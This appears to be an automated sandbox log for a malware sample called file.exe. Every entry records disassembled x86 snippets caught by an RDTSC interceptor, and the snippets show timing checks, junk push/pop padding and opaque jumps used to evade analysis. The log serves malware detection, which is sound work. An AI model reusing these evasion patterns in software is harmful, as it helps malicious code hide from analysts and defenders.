Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F272A second address: 7F272E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F272E second address: 7F2795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FAA34DB19B8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 stc 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FAA34DB19B8h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 jmp 00007FAA34DB19BFh 0x00000045 push eax 0x00000046 jo 00007FAA34DB19C4h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84C449 second address: 84C44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84C44F second address: 84C455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84BACE second address: 84BAEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jbe 00007FAA34ECFF56h 0x00000011 jmp 00007FAA34ECFF5Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84BC77 second address: 84BC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8505D7 second address: 8505E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 jnc 00007FAA34ECFF56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8505E6 second address: 8505EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84F95F second address: 84F975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAA34ECFF61h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84FC11 second address: 84FC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84FC1B second address: 84FC36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007FAA34ECFF5Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84FC36 second address: 84FC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84FC3F second address: 84FC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84FEE2 second address: 84FEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 857FC8 second address: 857FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A9676 second address: 7A968A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FAA34DB19B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FAA34DB19C2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A968A second address: 7A9690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A9690 second address: 7A96B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FAA34DB19BBh 0x0000000a push edi 0x0000000b pop edi 0x0000000c jo 00007FAA34DB19B6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A96B3 second address: 7A96C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAA34ECFF5Eh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A96C8 second address: 7A96CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A96CE second address: 7A96E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FAA34ECFF56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jl 00007FAA34ECFF56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C17E second address: 85C191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C191 second address: 85C196 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C196 second address: 85C1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19BBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C2F7 second address: 85C2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C2FB second address: 85C301 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C4A0 second address: 85C4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C4A4 second address: 85C4BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C4BB second address: 85C4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAA34ECFF5Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C4D2 second address: 85C4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C748 second address: 85C77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF60h 0x00000007 jmp 00007FAA34ECFF68h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007FAA34ECFF5Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A542 second address: 86A546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A546 second address: 86A54A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A54A second address: 86A553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A553 second address: 86A56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FAA34ECFF6Eh 0x0000000b jnl 00007FAA34ECFF5Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 868F58 second address: 868F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FAA34DB19BAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8690DB second address: 8690DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8690DF second address: 8690E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8690E3 second address: 869100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAA34ECFF56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAA34ECFF5Dh 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 869100 second address: 869104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 869104 second address: 86910C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86910C second address: 86911F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FAA34DB19BCh 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 869262 second address: 869268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8693B6 second address: 8693BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8693BA second address: 8693D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8693D4 second address: 8693D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8693D9 second address: 8693E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 869530 second address: 869560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FAA34DB19C3h 0x0000000a jmp 00007FAA34DB19BAh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 jng 00007FAA34DB19BEh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8682A9 second address: 8682AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8682AF second address: 8682B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8682B3 second address: 8682B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87229D second address: 8722A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87FCF5 second address: 87FD1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FAA34ECFF56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAA34ECFF67h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87F923 second address: 87F929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87F929 second address: 87F93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FAA34ECFF5Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87F93A second address: 87F946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007FAA34DB19B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87F946 second address: 87F94A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87F94A second address: 87F950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88230A second address: 882327 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FAA34ECFF67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 888D3E second address: 888D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C8h 0x00000007 jmp 00007FAA34DB19C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FAA34DB19BBh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88F459 second address: 88F4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007FAA34ECFF64h 0x0000000f jg 00007FAA34ECFF6Ch 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAA34ECFF5Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88F4AF second address: 88F4B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8935EA second address: 893621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FAA34ECFF66h 0x0000000c jmp 00007FAA34ECFF66h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 893621 second address: 89365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FAA34DB19C9h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FAA34DB19C1h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89BF36 second address: 89BF3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89BF3E second address: 89BF44 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89BF44 second address: 89BF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89BF4E second address: 89BF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89BF52 second address: 89BF84 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAA34ECFF56h 0x00000008 jne 00007FAA34ECFF56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 jmp 00007FAA34ECFF61h 0x00000019 pop eax 0x0000001a push ebx 0x0000001b jp 00007FAA34ECFF56h 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89A744 second address: 89A749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89A749 second address: 89A765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF66h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89A765 second address: 89A769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89A769 second address: 89A76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89A76D second address: 89A789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAA34DB19C1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89A789 second address: 89A78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89ABAA second address: 89ABAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89ABAE second address: 89ABC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FAA34ECFF56h 0x0000000e jp 00007FAA34ECFF56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89ABC2 second address: 89ABD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89B210 second address: 89B216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89B216 second address: 89B251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19C8h 0x00000009 popad 0x0000000a jnc 00007FAA34DB19BCh 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FAA34DB19BAh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89B251 second address: 89B260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FAA34ECFF56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89B260 second address: 89B270 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAA34DB19B6h 0x00000008 js 00007FAA34DB19B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89BC87 second address: 89BCB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FAA34ECFF67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jns 00007FAA34ECFF56h 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A20B9 second address: 8A20D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007FAA34DB19B6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1DD8 second address: 8A1DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAA34ECFF56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1DE2 second address: 8A1E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C6h 0x00000007 jmp 00007FAA34DB19BBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FAA34DB19B6h 0x00000016 je 00007FAA34DB19B6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1E15 second address: 8A1E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1E19 second address: 8A1E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A37EC second address: 8A37F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A37F2 second address: 8A37FE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAA34DB19B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A37FE second address: 8A380C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAA34ECFF5Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A6D38 second address: 8A6D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A6D3C second address: 8A6D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A6D49 second address: 8A6D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19BAh 0x00000009 popad 0x0000000a rdtsc
